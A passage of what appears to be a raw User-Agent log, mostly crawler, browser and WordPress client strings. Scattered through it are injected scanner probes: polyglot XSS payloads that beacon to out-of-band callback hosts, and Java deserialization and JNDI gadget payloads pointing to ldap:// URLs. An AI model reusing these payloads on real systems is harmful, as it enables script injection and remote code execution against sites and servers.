/\/5u0yddqlhs6b7mtdz5c4jgo08rew6kybm69wxl\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36 PTST/180215.170220 +WordPress/4.9.5; https://www.muycomputerpro.com +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1533123495-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/bfug0sfej90nq24fi3ldzefllcr5jtbkzfm5au\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/acq3vi8qzxogprbihau91l65qwwvnjfa35qvek\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729) PTST/260 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/vml6pn4qoeybiishuqtlus78bzhref66u1hr5g\.b.inty.io/).replace(/\\/g,[]))//'> +PHP/5.3.39 +Y!J-ASR/1.0 crawler (https://www.yahoo-help.jp/app/answers/detail/p/595/a_id/42716/) +YahooMailProxy; https://help.yahoo.com/kb/yahoo-mail-proxy-SLN28749.html +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529550673-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/eq879mmud12k3vpmve8dfpk940a4ds5jteg44t\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress.com; http://easyportugal.pt +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524551922-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1533069749-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/9w62fhspjw8f9qvh19e8lkq4avg0eo6fuah05p\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1523530529-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/cdthytdfhayoo32gg4jexfdmjdp7ovgm4hr7fw\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/jqdr95ta0837sp1bzzl4o47qiho8hw9nxik88x\.burpcollaborator.net/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1530706188-0 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 708; GTB7.5; .NET4.0C; .NET CLR 2.0.50727; .NET4.0E) +WordPress.com; https://cincocantos.com.br +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/if1n0zfljg0uq94mialkzlfsljrkh89zxukk89\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1528190051-0 +WordPress/4.9.2; https://creditos-portugal.com +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36 PTST/180202.170209 +WhatsApp/2.18.263 A +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Mobile Safari/537.36 PTST/171030.141054 +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; SE 2.X MetaSr 1.0) +NetSurf/3.6 (Linux) +["java.util.HashSet",[["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{"beanFactory":["org.springframework.jndi.support.SimpleJndiBeanFactory",{"shareableResources":["ldap://9u40xfk6hivd1akqnh8pgt7hc8i0h37rw.b.inty.io/"]}],"adviceBeanName":"ldap://9u40xfk6hivd1akqnh8pgt7hc8i0h37rw.b.inty.io/"}],["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{}]]] +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 769; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E) +python-requests/2.4.3 CPython/2.7.9 Linux/3.18.31-perf-g91a1159 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/8v4dgpvbz6gk6zkcy01afbvi197e921tpoce03\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524581747-0 +Screaming Frog SEO Spider/10.2 +Serf/1.3.9 (mod_pagespeed/1.13.35.2-0) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 757; InfoPath.1) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; QQDownload 718; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; QQDownload 1.7; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; InfoPath.1) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; QQDownload 769; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; Shuame; CoolNovo/2.0.9.20) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; QQDownload 708; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 627; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; QQDownload 769; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 769; InfoPath.3; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; TheWorld 6) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; QQDownload 718; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; SE 2.X MetaSr 1.0) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; QQDownload 718; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; QQDownload 734) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 718; .NET4.0C) +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QQDownload 757; SV1) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; QQDownload 718; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.3; .NET4.0C; .NET4.0E) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 760; .NET CLR 2.0.50727) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; QQDownload 718; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) +["java.util.HashSet",[["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{"beanFactory":["org.springframework.jndi.support.SimpleJndiBeanFactory",{"shareableResources":["ldap://ho98rneebqplvieyhp2xa11p6gca5ca0z.b.inty.io/"]}],"adviceBeanName":"ldap://ho98rneebqplvieyhp2xa11p6gca5ca0z.b.inty.io/"}],["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{}]]] +WordPress/4.5.13; http://miranbr.biz +WhatsApp/2.18.121 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/l9vqu29odjuxkcypcdfnto9vfmlqkec500nqbf\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1530302194-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/9kue5qkco75lv09dn1qb4ckjqaweq2it6oteh3\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/c0dhlt0f4alob3pg346ekf0m6dcd51xsln8dw2\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (Randomized by FreeSafeIP.com/upgrade-to-remove; compatible; MSIE 8.0; Windows NT 5.0) Chrome/21.0.1229.79 +curl/7.61.1 +Mozilla/5.0 (compatible; SeznamBot/3.2-test4; +http://napoveda.seznam.cz/en/seznambot-intro/) +python-requests/2.20.0 +Apache-HttpClient/4.5.6 (Java/1.8.0_191) +WordPress/4.8.3; http://www.sumarioactual.pt +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529605027-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/mwmffus2j98s93vu1mellxqha8g86wynmi98xx\.b.inty.io/).replace(/\\/g,[]))//'> +Googlebot/Nutch-1.7 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1535616989-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1532684890-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/lmbq72moqj7xxcbppdsn6omvsmyl09s0gv3lra\.b.inty.io/).replace(/\\/g,[]))//'> +Apache-HttpClient/4.5.2 (Java/1.7.0_151) +WordPress/4.9.6; https://www.almostlocals.com +Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0/cc-prepass-https; info@netcraft.com) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/98f2rh4pvwkflq7hd9q8xk24mvsrnff631qreg\.b.inty.io/).replace(/\\/g,[]))//'> +WhatsApp/2.18.158 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/1qsu99mhdo273ip9v180fckw4nar3fv6j16rug\.b.inty.io/).replace(/\\/g,[]))//'> +WhatsApp/2.18.71 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/t2w1lf5kcifh4zdlb9xe0ej0ur0noff3aq0ep\.burpcollaborator.net/).replace(/\\/g,[]))//'> +WhatsApp/2.18.222 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/vwv6zneqye8bsi2h4q3l4sh8lzrrsfk681vrjg\.b.inty.io/).replace(/\\/g,[]))//'> +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler aardwolf-production-crawler-62@moz.com) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/2bedeutxdlni7phojxisjzwf0660woofcaz0np\.b.inty.io/).replace(/\\/g,[]))//'> +HTTPClient/1.0 (2.7.0.1, ruby 2.3.1 (2016-04-26)) +WordPress/4.9.5; https://gruposolucao.pt +WordPress/4.9.6; https://o-tuga.com +WhatsApp/2.17.323 A +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1534313121-0 +rogerbot/1.1 (http://moz.com/help/pro/what-is-rogerbot-, rogerbot-crawler madagascarmoz.com) +WordPress/4.9.7; https://awesomeandalucia.com +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/vih03ciymt37tm7zlnox2yi5owu0rojf7au0ip\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.9.4; http://escoladobitcoin.com/blog +Arquivo-web-crawler (compatible; heritrix/1.14.4 http://arquivo.pt/faq-crawling) +python-requests/1.2.3 CPython/2.7.2 Windows/post2008Server +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/1pr6aip4tzad0se5stv394pbv217zvrmfh27qw\.b.inty.io/).replace(/\\/g,[]))//'> +Thumbor/6.4.2 +Java/1.8.0_191 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/vrq0ccryvtc72mgzunxxbyr5xw3nwbo2cxznnc\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/180313.180300 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524547106-0 +Apache-HttpClient/4.5 (Java/1.8.0_181) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/qsmvd7stwod23hhuviyscts0yr4s3gv7j26suh\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/kocp91onsi9wzbdorcum8nouul0ovcn3byyomd\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1528813269-0 +WordPress/4.9.1; http://downloadwitharia.online +WhatsApp/2.18.19 A +WhatsApp/2.18.110 A +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.0; QQDownload 716; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/h2kmny2k6fntd8rl598jmk2r8ieahy9pxkka8z\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/qwqjfys6jd8w97vy1qepl1qlacgb8z0qolbbz0\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1530706186-0 +!!javax.management.BadAttributeValueExpException [!!org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding ["foo", !!javax.naming.Reference [foo, "Freddy", "http://1z1s27pyma0562pis9dhllc9h0nuouki9.b.inty.io/"], !!org.apache.xbean.naming.context.WritableContext []]] +WhatsApp/2.18.37 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/ie0nzzeligzup93mhakkyleskjqagy8pwkja7z\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1523631794-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/xuv2feu0yvf95oj1xp0ze0u70y61utlhg46sv\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Windows NT 6.1; Catchpoint) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/180911.210918 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/yxz8jz3n56i4ce97qml8xrt8qzwqkib66twhl\.b.inty.io/).replace(/\\/g,[]))//'> +Offline Explorer 1.* +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Mobile Safari/537.36 PTST/180201.150247 +WordPress.com; https://invisibleflamelight.wordpress.com +WordPress/4.9.8; https://precisoviajar.com +Mozilla/5.0 (compatible; Lucidworks-Anda/2.0/0.8; ; david.conner@sas.com) +WordPress/4.9.1; https://freddieljungbergsite.com +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; QQDownload 718; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; Tablet PC 2.0) +curl/7.17.1 (mips-unknown-linux-gnu) libcurl/7.17.1 OpenSSL/0.9.8i zlib/1.2.3 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 718; 4399Box.970) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; QQDownload 766; GTB7.5; InfoPath.2) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Mobile Safari/537.36 PTST/180710.160748 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529605194-0 +WhatsApp/2.18.243 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/jpcc8rlzc61p20oruj7ieuje35958t0kofb5zu\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1533561070-0 +Mozilla/4.0 (compatible; GoogleToolbar 7.5.8231.2252; Windows 10.0; MSIE 9.11.16299.0) +WordPress/4.5.12; http://kouroubato.biz +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/ozrtk5zr3mk0afos2g5qjrzy5pbnbb32rxen2c\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.8.3; https://www.zestcarrental.com/blog +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/7u2cfouay5fj5yjbxz09eauh0860zorffa20qp\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1529605193-0 +WordPress/4.7.8; http://www.bancosdeportugal.info +Mozilla/2.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml) +WhatsApp/2.18.140 A +Apache-HttpClient/4.5 (Java/1.8.0_111) +GuzzleHttp/6.2.1 curl/7.35.0 PHP/5.6.23-1 deprecated dontuse deb.sury.org~trusty 1 +WordPress/4.6.10; https://www.comparaja.pt/blog +<x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:java="http://java.sun.com" xsi:type="java:org.springframework.beans.factory.config.PropertyPathFactoryBean"><target-bean-name>ldap://0lmro6bx89m4s1bhe8zg7ky83z9tdn1c.b.inty.io/</target-bean-name><property-path>foo</property-path><bean-factory xsi:type="java:org.springframework.jndi.support.SimpleJndiBeanFactory"><shareable-resource>ldap://0lmro6bx89m4s1bhe8zg7ky83z9tdn1c.b.inty.io/</shareable-resource></bean-factory></x> +WordPress/4.9.6; http://downloadfreefilesnow.gdn +WordPress/4.9.8; https://blog.alertaemprego.pt +Apache-HttpClient/4.5.2 (Java/1.8.0_111) +python-requests/2.7.0 CPython/2.7.12 Linux/4.4.0-119-generic +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524745325-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0 glindahl-cocrawler/0.1.5.dev240 g75d2efb.d20171228 ( http://www.pbm.com/~lindahl/glindahl-cocrawler.html) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/4ejcxqhvotrsgapwnk9pcpvb62ct2hu8i35tti\.burpcollaborator.net/).replace(/\\/g,[]))//'> +JetBrains Omea Reader 1.0.x (http://www.jetbrains.com/omea_reader/) +WordPress/4.9.2; http://arrowplus.pt +Gigabot/3.0 (http://www.gigablast.com/spider.html) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/w30pm4zcqjf2gd248wlvs7xrhinneb62uxhn5c\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1532903453-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 5.1.1; Lenovo_A6020a40 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1530805934-0 +WhatsApp/0.2.6426 N +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/h6omry6kafrth8vl99cjqk6rciij6bxzsmia7\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/jxkcgrtzk69pa0wr2jfimureb5h3ar2iqdd31s\.b.inty.io/).replace(/\\/g,[]))//'> +WordPress/4.9.3; http://www.cripto.digital +haena-pepper/Nutch-2.2.1 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/vqpo93mbdi213cp3vv8uf6kq4halc940svfl3a\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/5jpa4mj8n34huw89mxp738jfp6v3yrqied13ps\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/0hi52hh3ly2csr64ksn213han1t0rojf7au0ip\.b.inty.io/).replace(/\\/g,[]))//'> +Evernote Clip Resolver +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/wvv1gdvzzug86nk0yo1yfzv61x7q3ev5j06quf\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1535990407-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1530259965-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524745328-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/s5yyuxagotjhh77zuwo1cq20zr5ht9kxfk58u\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/zad4vga2exvblqz3drg1u2a9g0muiia9y4lu9j\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/mmcr73mpqk7yxdbqpeso6pmwsnyqzer5f02qqf\.b.inty.io/).replace(/\\/g,[]))//'> +WhatsApp/2.17.442 A +WordPress.com; http://financialreports.blogrance.com +SocialRankIOBot; http://socialrank.io/about +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524069893-0 +WordPress/4.9.5; https://www.comparaja.pt/blog +WordPress.com; http://pauloscalfoni.com +WhatsApp/2.18.164 A +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4) Build/MPJ24.139-64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36 PTST/180302.160343 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/pb4iux75ycnvo6axgpto005kpbv9txlo9jw9ky\.b.inty.io/).replace(/\\/g,[]))//'> +["java.util.HashSet",[["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{"beanFactory":["org.springframework.jndi.support.SimpleJndiBeanFactory",{"shareableResources":["ldap://aes1hg471jfelb4r7isq0uriw9233y8mx.b.inty.io/"]}],"adviceBeanName":"ldap://aes1hg471jfelb4r7isq0uriw9233y8mx.b.inty.io/"}],["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{}]]] +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/m3qro33p7koyedsq6e9onp3w9nffa32uqpdf14\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524822096-0 +WhatsApp/2.18.111 A +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/uwunf2sajh809bv21uetl5qpaggg941vpqcg05\.b.inty.io/).replace(/\\/g,[]))//'> +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler aardwolf-crawl-production-api-01@moz.com) +WordPress/4.9.4; https://www.elmundoentubolsillo.es +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1528411846-0 +python-requests/2.7.0 CPython/2.7.10 Linux/3.13.0-117-generic +KinglandSystemsCorp/KinglandSystemsCorp-crawler-2.2.0 (A nutch crawler configuration from Kingland Systems; http://www.kingland.com; kyle dot hansen at kingland dot com) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/3osw7bkjbq091knbt362deiy2p8m0as1gw3mrb\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1523956914-0 +WordPress/4.9.4; http://juntandolecomcre.com +WordPress/4.8.1; http://ncreditos.pt +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1524061517-0 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/pyrihxu5lcavb6xx3pgon0skcbi4isajyel49t\.b.inty.io/).replace(/\\/g,[]))//'> +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/ld2ewt9108prq2ctilvk2w7gr7xynobg24xrnfc\.b.inty.io/).replace(/\\/g,[]))//'> +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler aardwolf-production-crawler-20@moz.com) +Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0 - James BOT - WebCrawler http://cognitiveseo.com/bot.html +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1528878673-0 +AppEngine-Google; ( http://code.google.com/appengine; appid: s~weather-api-faux-service) +GuzzleHttp/6.2.1 curl/7.47.0 PHP/7.1.13-1 ubuntu16.04.1 deb.sury.org 1 +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/6ryhuy91tp3mntxsz1ywz3cjgam2hq9hxck28r\.b.inty.io/).replace(/\\/g,[]))//'> +rogerbot/1.1 (http://moz.com/help/pro/what-is-rogerbot-, rogerbot-crawler vanguard@moz.com) +javascript:/*</script><svg/onload=' /"/ /onmouseover=1/ /[*/[]/ ((new(Image)).src=([] /\/xijq15ed5ku3veh5nx0w78cswj2m1at1hw4msb\.b.inty.io/).replace(/\\/g,[]))//'> +Mozilla/5.0 (compatible; Yahoo! Slurp; 